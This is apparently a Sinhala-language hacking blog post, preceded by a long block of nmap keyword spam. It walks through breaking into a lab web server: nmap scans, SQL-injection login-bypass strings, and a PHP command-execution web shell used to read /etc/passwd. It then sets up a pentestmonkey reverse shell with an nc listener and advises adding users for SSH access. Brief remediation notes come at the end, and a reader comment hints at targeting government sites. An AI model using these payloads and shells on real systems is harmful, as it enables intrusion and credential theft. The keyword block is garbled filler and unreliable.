nmap full port scan nmap f nmap f option nmap f flag nmap get mac address nmap guide nmap get hostname nmap github nmap guess os nmap gui ubuntu nmap grep output nmap get certificate nmap grab banner gmaps gmap4 gmapping gmapsupp.img gm appone gmapa gmaps.js gmaps python gmapprom.img nmap host discovery nmap http nmap hostname nmap help nmap how to nmap heartbleed nmap host seems down nmap hacking nmap home assistant nmap http methods nmap.h nvapi.h nmap install nmap ipv6 nmap ip range nmap intense scan nmap input file nmap interface nmap identify os nmap icmp scan nmap install mac nmap ip address nmap i linux who am i nmap i-doit nmap nmap java nmap json output nmap java rmi nmap just ping nmap json nmap jboss nmap javascript nmap jmx nmap jdwp nmap jetdirect map j gj nmap kali nmap kali linux commands nmap kali linux tutorial nmap kerberos nmap kubernetes nmap keys nmap kya hai nmap kibana nmap kali linux download nmap kullanımı k map k map solver k map example k mbappe k map 3 variables k map rules k map numbering k map login k map pos k map don't care nmap list nmap local network nmap linux command nmap localhost nmap license nmap list scan nmap latest version nmap linux install nmap list scripts l'outil nmap nmap l nmap man nmap mac address nmap manual nmap multiple ips nmap ms17-010 nmap multiple subnets nmap mac install nmap mysql nmap mac download mn map mn map of lakes mn map of counties mn mape mn map google mn mape contract mn maple trees mn map of towns mn maple syrup mn map with county lines nmap nse nmap network scanning nmap network nmap no ping nmap network scanning pdf nmap ncat nmap null scan nmap not found nmap network discovery nmap nfs nmap n nmap n option nmap in linux nmap n nzz nmap n'est pas reconnu nmap output nmap on mac nmap on windows nmap open filtered nmap open ports map of us nmap output to file nmap o option o'reilly nmap nmap o que é nmap o que faz wireshark on map usando o nmap utilizando o nmap baixar o nmap usar o nmap o que nmap nmap port scan example nmap portable nmap python nmap pn nmap ping sweep subnet nmap port scanner nmap powershell nmap port filtered nmap p option nmap p command nmap p pn nmap quick scan nmap quick nmap quiet mapquest driving directions nmap quick ping scan nmap quick scan plus nmap quiet scan nmap quick os detection nmap quick scan local network nmap q es nmap range nmap raspberry pi nmap range scan nmap run all scripts nmap reverse dns nmap resume nmap rpm nmap results nmap randomize hosts nmap review nmap r nmap r&d nmap r option nmap scan nmap switches nmap state filtered nmap stealth scan nmap ssl-enum-ciphers nmap scan for open ports nmap s ms-sql-s nmap nmap s.o nmap tool nmap traceroute nmap top ports nmap t4 nmap test port nmap tcp scan nmap tcpwrapped nmap tcp port scan nmap tls scan nmap t flag nmap t shirt nmap t switch nmap t command nmap t values nmap t 옵션 nmap udp nmap udp port nmap usage nmap ubuntu nmap uses nmap udp open filtered nmap udp ping nmap update scripts nmap utility nmap ubuntu install us map us map quiz us map with cities us map with capitals us map time zones us map blank us map outline us maps navy us map test us map east coast nmap verbose nmap version nmap vs nessus nmap vs zenmap nmap vs netstat nmap vulners nmap vulscan nmap vim nmap vs netcat nmap v nmap v command netstat vs nmap nmap vpn nmap v オプション nmap windows download nmap wiki nmap windows portable nmap web nmap wsl nmap windows gui nmap website nmap what does filtered mean nmap wannacry nmap w nmap w akcji nmap xml nmap xmas scan nmap xml to csv nmap xml parser nmap xml to html nmap xml viewer nmap x11 nmap xsl nmap xsl stylesheet nmap xml to json nmap x-frame-options os x nmap station x nmap cheat sheet os x nmap gui x server detection nmap mac os x nmap install x.509 certificate nmap nmap youtube nmap yum nmap yourself nmap your port specifications are illegal nmap yocto nmap your network nmap yum repository nmap your own network nmap you are compiling without openssl nmap your host specifications are illegal nmap y netstat nmap y metasploit nmap and zenmap nmap y python nmap y netcat nmap y vulscan nmap y zenmap escaneo de puertos snort y nmap nmap y grep nmap y wireshark nmap zenmap nmap zombie scan nmap zone transfer nmap zenmap tutorial nmap zmap nmap zombie scan command nmap zabbix nmap zenmap wiki nmap zenmap commands nmap zhen gui zenmap zenmap tutorial zenmap scan zenmap commands zenmap portable zenmap scan range zenmap wiki zenmap topology nmap 0 hosts up nmap 0/24 nmap 0.0.0.0 nmap 08-067 nmap 0.6.1 nmap ms15-034 nmap ms12-020 nmap ms09-050 nmap ms03-026 nmap 0 nmap 101 nmap 127.0.0.1 nmap 1000 ports nmap 100 most common ports nmap 192.168.x.x nmap 10.0.0.0/8 nmap 1000 ports list nmap 1 host up nmap 169.254 nmap 135 1. nmap 1 - nmap(network mapper) nmap 1 port nmap ethernet ip-1 sh 1 nmap not found man1 nmap smb version 1 nmap ssh version 1 nmap nmap 2008 nmap 2018 nmap 256 hosts up nmap 2 ports nmap 21/tcp filtered ftp nmap /24 nmap 2017 nmap 22 port nmap 22 nmap 22/tcp closed ssh maplestory 2 nmap 2 metasploitable 2 nmap python 2 nmap man 2 nmap struts2 nmap struts2 nmap scan nmap 3389 nmap 3des nmap 32 bit nmap 3389/tcp filtered ms-wbt-server nmap 3.81 nmap 3.81 exploit nmap 3.81 privilege escalation nmap 3306 nmap 3389 scan nmap 3 way handshake map 3 python 3 nmap metasploitable 3 nmap witcher 3 map warcraft 3 maps python3 nmap example metasploitable 3 nmap scan python3 nmap port scanner raspberry pi 3 nmap nmap 443 nmap 445 nmap 443/tcp closed https nmap 4.11 nmap 4.11 exploit nmap 4.11 script nmap 445/tcp filtered microsoft-ds nmap 443 filtered nmap 4096 limit nmap 445 filtered 4. nmap for android nmap 4 fallout 4 map die hard 4 nmap nmap 4 windows nmap 5.51 nmap 5.51 should i remove it nmap 514 tcp filtered shell nmap 5060 nmap 5.21 nmap-5.51-setup nmap-5.51.tar.bz2 nmap-5.51-setup.exe download nmap 53/udp open filtered domain nmap-5.51-setup.exe nmap 5 lab 5 nmap scan report centos 5 nmap top 5 nmap commands gta 5 map hak5 nmap backtrack 5 nmap 5 features of nmap red hat 5 nmap nmap 64 bit nmap 6.47 nmap 6 cookbook nmap 6.25 nmap 6.47 download nmap 6.25 download nmap 65535 nmap-6.40-7.el7.x86_64.rpm nmap 65000 ports nmap 6 cookbook pdf nmap 6 nmap 6 network exploration pdf nmap 6 rpm nmap 6 mac centos 6 nmap centos 6 nmap rpm rhel 6 nmap centos 6 nmap 7 centos 6 nmap-ncat nmap 7.70 nmap 7.01 nmap 7.12 nmap 7.6 nmap 7.7 nmap 7 cheat sheet nmap 7.31 nmap 7.40 download nmap 7.00 nmap 7.31 apk 7 nmap scripts 7 nmap nse scripts for recon nmap 7 nmap 7 download nmap 7 debian nmap 7 pdf nmap 7 centos nmap 7 book nmap 80 nmap 80 port scan nmap 8080 nmap 80/tcp closed http nmap 80/tcp filtered http nmap /8 nmap 80 443 nmap port 80 filtered nmap windows 8 windows 8 nmap debian 8 nmap install debian 8 nmap nmap 9100 nmap 999 filtered ports nmap 99.99 nmap port 9100 nmap killed 9 openvas 9 nmap version openvas 9 nmap nmap debian 9 nmap port 993 debian 9 nmap nmap maps nmap windows nmap cheat sheet nmap download nmap port scan mapquest nmap ping sweep nmap mac nmap online nmap commands nmap all ports nmap android nmap arp scan nmap apk nmap alternative nmap arguments nmap aggressive scan nmap all ports are filtered nmap ack scan nmap app a map a map of the united states a map of the world a map of florida a map of texas a map of europe a map of africa a map of california a map of the usa a map of michigan nmap banner grab nmap book nmap basics nmap basic scan nmap bypass firewall nmap book pdf nmap brew nmap brute force nmap basic commands nmap broadcast-dhcp-discover nmap b class nmap b mapa b nmap command line nmap check port nmap command not found nmap check open ports nmap cmd nmap cygwin nmap cipher scan nmap check specific port nmap c library nmap c api nmap c source code nmap c code nmap c-e e# cr nmap c class mmap c linux nmap c'est quoi hf jnf c nmap man nmap c nmap discovery scan nmap dns nmap documentation nmap detect os nmap definition nmap default ports nmap default scan nmap deep scan nmap download mac nmap d nmap d option nmap в linux nmap examples nmap enum ciphers nmap eternalblue nmap exclude nmap examples linux nmap equivalent windows nmap elasticsearch nmap explained nmap exe nmap export to xml nmap e oque e nmap e napló nmap and metasploit oq e nmap nmap en mac nmap e zenmap nmap en windows nmap for windows nmap for mac nmap flags nmap for windows 10 nmap filtered vs closed nmap failed to open device nmap for android nmap fingerprint nmap hacking kali linux kali nmap hacking nmap kali linux hacking
ඔව් ඉතින් පින්වතුනි අද කියන්න හදන්නේ කවුරුත් දන්නා nmap වලින් කොහොමද lan එක scan කරලා ඒකෙ සර්වර් එකකට ඇතුල් වෙන විදිහ


සෙටප් එක ගැන කිව්වෝත් මේකේ කාලි මැෂින් එකයි web for penterster කියල සර්වර් එකකුයි තියෙන්නේ

හරි මුලින්ම මන් ගන්නේ මේකට කාලි ලිනක්ස් එකක්

එකේ terminal එක open කරලා nmap කියල ගහල enter කරන්න

nmap 


එතකොට මේ වගේ හැඳින්වීමක් දෙයි ඔයාලට



දැන් ip addr කියන කමාන්ඩ් එක ගහල අපේ ලෝකල් ip එක බලමු
ip addr


හරි මේ තියෙන්නේ මගේ ලෝකල් ip එක


දැන් අපි බලමු කොහොමද lan එක scan කරන්නේ කියලා
nmap -v -sn 192.168.10.100-150


ඕක ගහල enter කරන්න


 දැන් scan වෙයි


දැන් මෙහෙම එයි



හරි ඔය උඩ තියෙන්නේ අපි scan කරපු එකේ report එක මොනාද on එකේ සහ මොනාද නැත්තේ කියල


දැන් බලමු මොනාද banner එලියට දෙන්නේ කියලා

ඒ කියන්නේ ඔය service එකක් එහෙම රන් වෙනවා නම් එකේ header එක එහෙම පෙන්නන්නේ ඒවා අල්ලන එක තමා මේ




මේ එකේ output එක



මේ තියෙන්නේ ip range එකක තියන පොර්ට් 65536 ම scan කරන කමාන්ඩ් එක
මේක තමා වටින්නේ
nmap -p- 192.168.1.100-150


මේ තියෙන්නේ එක රන් කළාම



හරි මන් දැක්ක දැන් මේකේ ssh පොර්ට් එක open එකේ තියනවා ඉතින් මන් බලනවා මොඅක්ද මේ සර්වර් එක කියලා
ssh 192.168.10.104


ඔන්න මේකේ බැනර් එකක් තියනව
මන් දන්නවා මේක දැන් මොකක් හරි වටිනා සර්වර් එකක් කියලා හැබැයි මන් මේකේ username වත් පාස්වර්ඩ් වත් දන්නේ නෑ



දැන් මන් කරන්න හදන්නේ මේකේ os එක මොකක්ද කියල බලන්න
nmap -O 192.168.10.104


ඔන්න දැන් පේනවා මේකේ විස්තර ටිකක් මොකක්ද os එක සර්විස් මොනාද mac එක මොකක්ද වගේ දේවල් ටිකක්

දැන් බලන්නේ මේකේ http නොහොත් web සර්විස් මොනාද එලියට දීලා තියෙන්නේ කියලා සහ web සර්විස් වල තියන අඩුපාඩු මොනාද කියලා
nmap --script=http-enum 192.168.10.104


මේ තියෙන්නේ තියන සර්විස් සහ ඒවගේ අඩුපාඩු



හරිනේ වැඩේ ආතල් වගේ

දැන් මන් බලනවා මොනාද මේකේ තියන සර්විස් වල version ටික කියල


nmap -sV --version-all 192.168.10.104
nmap -sV --version-intensity 5 192.168.10.104

 ඔය දෙකම පාවිච්චි කරන්න පුළුවන්



ඔයාලට පේනවා ඇති මේ සර්විස් වල version එක බලාගන්න පුළුවන්
මේකේ තියන වටිනාකම තමා මේවගේ පරණ version වල එක එක අවුල් ආව අපිට තියෙන්නේ ඒවා හොයාගෙන ගේම දෙන්න




හරිනේ දැන් මන් browser එක open කරලා මේකේ ip එක ගහනවා web එක ලෝඩ් කරන්න




දැන් පලවෙනි ලින්ක් එකට ගිහින් බලනව මොනාද කරන්න පුළුවන් කියල


හරි දැන් පොඩි sql injection එකක් දීල බලමු


  • admin' --
  • admin' #
  • admin'/*
  • ' or 1=1--
  • ' or 1=1#
  • ' or 1=1/*
  • ') or '1'='1--
  • ') or ('1'='1--

 එකක් දෙකක් ගහල බලන්න වැඩ කරයි


හරි දැන් මන් php එකක් අප්ලෝඩ් කරලා සර්වර් එකේ /etc/passwd ෆයිල් එක read කරන්න හදන්නේ
වැඩේට php ෆයිල් එකක් හදාගන්න මේ කෝඩ් එක දාල


<?php

echo system ($_GET ["val1"].' '.$_GET ["val2"] );


?>
දැන් එක අප්ලෝඩ් කරලා click කරන්න තියෙන්නේ

ඊටපස්සේ url එකේ මේක ගහන්න

http://192.168.10.104/upload/images/simple.php?val1=cat&val2=/etc/passwd

වැඩේ පොඩ්ඩක් ගලපලා ගහන්න
 හරි නම් සර්වර් එකේ පාස්වර්ඩ් file එක පෙන්නයි



දැන් බලමු shell එකක් php වලින් open කරගන්න විදිහ

මේක ගන්න php file එකකට

මේක අරන් මේකේ php-reverse-shell.php එක එඩිට් කරගන්න තමන්ගේ ip සහ පොර්ට් දාල
http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
දැන් ඔකේ අදාළ තැන් වලට ip පොර්ට් එහෙම දීලා save කරලා ඉන්න




දැන් මේ වගේ file අප්ලෝඩ් කරන්න තියන තැනකට ගිහින් අප්ලෝඩ් කරන්න




දැන් කාලි එකේ
nc -nvlp 1234

 කියල ගහල listener එකක් දාගන්න

දැන් අරක අප්ලෝඩ් කරලා රන් කරන්න

වැඩේ හරි නම් මේ වගේ shell එකක් open වෙයි ඔයාගේ machine එකේ

මේ තියෙන්නේ සර්වර් එකේ shell එක



දැන් ඔයාට permission තියනවා නම් කෙලින්ම පුළුවන් user කෙනෙක් add කරලා පාස්වර්ඩ් එකක් දාල එකෙන් ssh වලින් ලොග් වෙන්න නැත්තම් තියන ලොගින් එකක පාස්වර්ඩ් වෙනස් කරලා ssh වලින් ලොග් වෙලා ඕනි දෙයක් කරන්න



Vulnerability අවුල් තැන්

Recommendations to fix weaknesses
❖ SQL injection
• Using of Prepared Statements
• Using Parameterized Queries
• Using of Stored Procedures
• White List Input Validation
• Escaping All User Supplied Input
• Enforcing Least Privilege
• Performing White List Input Validation as a Secondary Defense
❖ File Upload Vulnerability
• Use validated file extensions.
• Limiting upload facility registered users.
• Check the file from the internet for content. Make sure it is the file type we are accepting. • Use other file hosting site to accept files (google drive, MediaFire).
• Restricting users to file storing location.
• Add some random value to file when it storing.
❖ Reverse Shells
• Install good firewall.



Next
This is the most recent post.
Previous
Older Post
Manusha

Manusha Amal

මගේ තියන අත්දැකීම් මේ බ්ලොග් එක කියවන ඔබට පේනවනේ, ඉතින් ඔයාලට ගැටළුවක් අවොත් මාව Contact කරගන්න පුළුවන්.

Post A Comment:

1 comments:

  1. කියන්න සතුටුයි පිංවතුනි ගවර්මන්ට් වෙබ් සයිට් වලට බුදු සරණයි දෙවි පිහිටයි

    ReplyDelete

දිරියක් වෙන්න අදහස් පෙළක් දාන්න